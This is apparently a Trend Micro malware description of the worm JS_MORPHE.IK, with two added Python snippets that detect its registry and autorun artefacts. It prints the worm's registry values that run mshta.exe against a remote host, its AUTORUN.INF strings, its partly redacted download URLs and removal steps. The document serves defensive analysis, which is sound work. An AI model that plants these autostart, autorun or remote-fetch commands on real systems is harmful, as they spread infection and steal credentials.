Analysis by: Sabrina Lei Sioting

PLATFORM:

Windows 2000, Windows XP, Windows Server 2003


  • Threat Type: Worm

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

OVERVIEW

Infection Channel: Copies itself in all available physical drives, Propagates via removable drives

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be hosted on a website and run when a user accesses the said website.

It adds certain registry entries to disable the Task Manager. This action prevents users from terminating the malware process, which can usually be done via the Task Manager.

It drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.

TECHNICAL DETAILS

File Size: 17,408 bytes
File Type: HTML, HTM
Memory Resident: Yes
Initial Samples Received Date: 12 Apr 2012
Payload: Drops files, Connects to URLs/IPs, Downloads files, Terminates processes

Arrival Details

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It may be hosted on a website and run when a user accesses the said website.

Installation

This worm drops and executes the following files:

  • %Desktop%\msn\d.tpl - same detection name
  • %Desktop%\msn\d.reg - detected as REG_MORPHE.A

(Note: %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.)

Autostart Technique

This worm adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CLASSES_ROOT\WinRAR\shell\
open\command
{default} = ""%System%\mshta.exe" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1""

HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui
{default} = "Abrir Carpeta"

HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui
{default} = "Abrir Unidad de Disco"

HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

Other System Modifications

This worm adds the following registry entries as part of its installation routine:

HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Start Page = "http://mail-live.no-ip.info"

HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Window Title = "::M0rPheU$:: v2.1"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = "0"

It adds the following registry entries to disable the Task Manager:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = "1"
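Taken together, the entries above give a defender a registry signature for this worm. The Python below is an added example, not code from the Trend Micro description: it parses a .reg export (a constructed sample is embedded, with the remote host replaced by the placeholder BLOCKED-HOST) and flags the DOSAqui shell verbs, shell commands that run mshta.exe against a URL, the DisableTaskMgr and fDenyTSConnections settings, and the Internet Explorer window-title tag.

```python
import re

# Constructed sample .reg export (not from the page) with the entries this worm adds;
# the remote host is a placeholder, the URL path is the one the description lists.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\shell\DOSAqui]
@="Abrir Carpeta"

[HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command]
@="mshta.exe http://BLOCKED-HOST:102/m0rpheus/morpheus2010/msnmsgr.tpl"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
'''

def parse_reg(text):
    """Map key path -> {value name: value} from a .reg export ('@' is the default value).
    Strings are taken literally; .reg escape sequences are not decoded."""
    entries, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            entries[current] = {}
        elif current and '=' in line:
            name, _, raw = line.partition('=')
            name = '(default)' if name == '@' else name.strip('"')
            entries[current][name] = int(raw[6:], 16) if raw.startswith('dword:') else raw.strip('"')
    return entries

def find_morphe_indicators(text):
    """Return (label, key) findings for the registry artefacts described for JS_MORPHE.IK."""
    findings = []
    for key, values in parse_reg(text).items():
        k = key.lower()
        for name, value in values.items():
            v = str(value).lower()
            if re.search(r'\\(directory|drive|winrar)\\shell\\', k):
                if 'dosaqui' in k:                     # the worm's custom Explorer verb
                    findings.append(('DOSAqui shell verb', key))
                if 'mshta' in v and 'http' in v:        # verb command runs mshta on a remote URL
                    findings.append(('mshta remote command', key))
            if k.endswith(r'policies\system') and name == 'DisableTaskMgr' and value == 1:
                findings.append(('Task Manager disabled', key))
            if k.endswith('terminal server') and name == 'fDenyTSConnections' and value == 0:
                findings.append(('Remote Desktop enabled', key))
            if k.endswith(r'internet explorer\main') and name == 'Window Title' and 'm0rpheu' in v:
                findings.append(('IE window title tag', key))
    return findings
```

On a live system the same check can be run over the output of `reg export` for each of the hives named above.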

Propagation

This worm drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.

The said .INF file contains the following strings:

[autorun]
open="inf.exe"
icon="%SystemRoot%\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=^1
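A defender can scan AUTORUN.INF files on removable media for the pattern above. The Python below is an added example and not part of the Trend Micro description: it parses a constructed copy of the INF content and reports the three traits that make it suspicious (an executable launched from the drive, the hijacked default open verb, and the borrowed system folder icon).

```python
# Constructed AUTORUN.INF content mirroring the strings described for this worm
# (not a file taken from the page).
SAMPLE_AUTORUN = r'''[autorun]
open="inf.exe"
icon="%SystemRoot%\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=^1
'''

def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section (keys lower-cased, quotes stripped)."""
    values, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('['):
            in_section = line.lower() == '[autorun]'
            continue
        if in_section and '=' in line:
            key, _, val = line.partition('=')
            values[key.strip().lower()] = val.strip().strip('"')
    return values

def assess_autorun(text):
    """List the reasons an INF is suspicious, following the behaviour this worm's INF shows."""
    v = parse_autorun(text)
    reasons = []
    launch = {v[k] for k in ('open', r'shell\open\command') if v.get(k)}
    # Any executable launched from the drive itself rather than a trusted install path.
    if any(p.lower().endswith('.exe') for p in launch):
        reasons.append('launches executable from drive: ' + ', '.join(sorted(launch)))
    # A custom 'open' verb made the default, disguised as the normal "open folder" action.
    if v.get(r'shell\open') and v.get(r'shell\open\default') == '^1':
        reasons.append('overrides the default Explorer open verb')
    # Folder icon borrowed from shell32.dll so the drive looks like a plain folder.
    if 'shell32.dll' in v.get('icon', '').lower():
        reasons.append('uses a system folder icon to disguise the drive')
    return reasons
```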

Process Termination

This worm terminates the following processes if found running in the affected system's memory:

  • avgnt.exe
  • avguard.exe
  • avshadow.exe
  • chrome.exe
  • firefox.exe
  • GoogleUpdate.exe
  • msnmsgr.exe
  • GoogleCrashHandler.exe
  • mailpv.exe

Dropping Routine

This worm drops the following files:

  • %User Profile%\Datos de programa\Microsoft\Internet Explorer\Quick Launch\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %Desktop%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Desktop\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
  • %User Startup%\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
  • %User Startup%\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
  • %StartMenu%\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %StartMenu%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %User Profile%\Recent\Windows Live Messenger.lnk - detected as LNK_MORPHE.III

(Note: %User Profile% is the current user's profile folder, which is usually C:\Windows\Profiles\{user name} on Windows 98 and ME, C:\WINNT\Profiles\{user name} on Windows NT, and C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003. %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003. %System Root% is the root folder, which is usually C:\. It is also where the operating system is located. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, and C:\Documents and Settings\{User name}\Start Menu\Programs\Startup.)

Download Routine

This worm connects to the following website(s) to download and execute a malicious file:

  • http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msn/msn.js

NOTES:

This worm drops the following files in all physical and removable drives found in the affected system:

  • inf.exe - detected as TSPY_SPYEKS.C
  • Windows Live Messenger.lnk - detected as LNK_MORPHE.III

It searches for subfolders in the following folders and, for each subfolder found, drops a shortcut link named {folder name}.lnk:

  • {drive letter}
  • %Desktop%
  • %User Profile%\My Documents
  • %Start Menu%
  • %Start Menu%\Programs
  • %Start Menu%\Programas

It sets the attributes of the folders it finds to Hidden so that users believe the folders have been deleted. The dropped shortcut links are detected as LNK_MORPHE.III.

It creates a duplicate copy of the following files with a different file name:

  • %Desktop%\msn\m2011.tt copied as %Desktop%\msn\m2011.exe
  • %Desktop%\msn\mailpv.tt copied as %Desktop%\msn\mailpv.exe

It then executes the copied files, so the malicious routines of the copied files run on the affected system.

This worm connects to the following URLs to download its components and renames them before storing them on the affected system:

  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\inf.tt - detected as TSPY_SPYEKS.C
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailer.js - saved as %Desktop%\msn\mailer.tpl - detected as JS_MAILER.AC
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailpv.js - saved as %Desktop%\msn\mailpv.tt - detected as HKTL_MAILPASSVIE
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\m2011.tt - detected as TSPY_SPYEKS.C
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/morph.jpg - saved as %Desktop%\msn\M0rPheU$_Esta_Aqui.jpg
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/MA.tt - saved as %Desktop%\msn\Mejores Amigos.zip - detected as LNK_MORPHEUS.VTG

It sends a ping command to the following IP addresses:

  • {BLOCKED}.{BLOCKED}.179.157
  • {BLOCKED}.{BLOCKED}.221.201

It changes the attribute of the folder %Desktop%\msn to Hidden.

SOLUTION

Minimum Scan Engine: 9.200
FIRST VSAPI PATTERN FILE: 8.962.01
FIRST VSAPI PATTERN DATE: 02 May 2012
VSAPI OPR PATTERN File: 8.963.00
VSAPI OPR PATTERN Date: 02 May 2012

Step 1

For Windows XP and Windows Server 2003 users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.

Step 2

Close all open browser windows

Step 3

Remove malware files dropped/downloaded by JS_MORPHE.IK

    • REG_SCRDL.A
    • TSPY_SPYEKS.C
    • LNK_MORPHE.III
    • JS_MAILER.AC
    • HKTL_MAILPASSVIE
    • LNK_MORPHEUS.VTG

Step 4

Restart in Safe Mode


Step 5

Delete this registry value


Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how, or ask your system administrator for assistance. Otherwise, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CLASSES_ROOT\WinRAR\shell\open\command
    • {default} = ""%System%\mshta.exe" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1""
  • In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui
    • {default} = "Abrir Carpeta"
  • In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command
    • {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
  • In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui
    • {default} = "Abrir Unidad de Disco"
  • In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui\Command
    • {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
  • In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    • Start Page = "http://mail-live.no-ip.info"
  • In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    • Window Title = "::M0rPheU$:: v2.1"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    • fDenyTSConnections = "0"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    • DisableTaskMgr = "1"

Step 6

Search and delete AUTORUN.INF files created by JS_MORPHE.IK that contain these strings

[autorun]
open="inf.exe"
icon="%SystemRoot%\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=^1

Step 7

Restart in normal mode and scan your computer with your Trend Micro product for files detected as JS_MORPHE.IK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
